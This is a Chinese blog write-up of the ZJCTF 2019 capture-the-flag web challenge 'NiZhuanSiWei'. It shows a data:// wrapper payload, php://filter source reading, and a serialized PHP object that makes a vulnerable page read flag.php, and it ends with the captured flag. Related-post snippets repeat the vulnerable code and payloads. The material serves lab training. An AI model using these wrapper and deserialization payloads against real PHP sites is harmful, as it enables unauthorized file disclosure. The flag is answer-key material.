[ZJCTF 2019] web题-NiZhuanSiWei

最新推荐文章于 2020-11-05 10:46:20 发布
最新推荐文章于 2020-11-05 10:46:20 发布
阅读量406 收藏 1
点赞数
分类专栏: CTF练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BROTHERYY/article/details/107206341
版权

复现环境:buuoj.cn

开题源码一份
在这里插入图片描述
分析源码
需要将内容"welcome to the zjctf"传入到$text,才能有下一步操作
payload:/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
然后是file参数,使用filter来读取useless.php,解码得源码
在这里插入图片描述

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

对该代码进行序列化,需要将flag.php赋值给变量$file

在这里插入图片描述
最终形成的payload:
/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}

在这里插入图片描述

flag{c9ff42ab-e3e4-4e0a-b3f2-7428d04ed64a}

BROTHERYY
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ZJCTF 2019]NiZhuanSiWei
brainw的博客
04-22 2624
[ZJCTF 2019]NiZhuanSiWei 代码审计 查看一下useless.php --只有注释信息 没有用 利用data协议绕过 将welcome to the zjctf写入 而data://协议允许读入 payload: text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 到这里就不会了 只有看下wp了 正则判断...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
浙江省大学生网络与信息安全竞赛-决赛-2019-Web-逆转思维(php几个协议的运用)
weixin_45844670的博客
09-23 1412
<?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"
广东省2023技能大赛网络安全赛项 C模块wp
最新发布
04-20
- **反序列化**:在Web应用中,如果开发者没有正确处理用户输入的数据,可能会导致反序列化漏洞。例如,通过手动将`$file`赋值为`flag.php`,然后通过序列化和传递payload来触发反序列化过程,最终获取Flag。 通过...
BUUCTF:[ZJCTF 2019]NiZhuanSiWei
末初的CSDN博客
11-05 1209
目地址:https://buuoj.cn/challenges#[ZJCTF%202019]NiZhuanSiWei目了 /?text=php://input&file=php://filter/read=convert.base64-encode/resource=useless.php POST内容 welcome to the zjctf useless.php <?php class Flag{ //flag.php public $file;.
[ZJCTF 2019]NiZhuanSiWei 1
feng的博客
10-23 1331
知识点 文件包含与各种协议 反序列化 WP 首先进入环境,得到源码: $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r').
web-[ZJCTF 2019]NiZhuanSiWei
wojiushilsy的博客
05-15 317
目要点目内容解第一个绕过:第二个绕过第三个绕过 目要点 php伪协议 data://text/plain,编码(base64),内容 php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。 resource=<要过滤的数据流> 这个参数是必须的。它.
魔术方法总结
梦里不知身是客
12-26 9857
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
[原复现+审计][ZJCTF 2019] WEB NiZhuanSiWei(反序列化、PHP伪协议、数组绕过)
笑花大王
03-03 718
简介 原复现:https://github.com/CTFTraining/zjctf_2019_final_web_nizhuansiwei/ 考察知识点:反序列化、PHP伪协议、数组绕过 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此 过程 打开页面看到源码先审计 大致分析flag在f...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值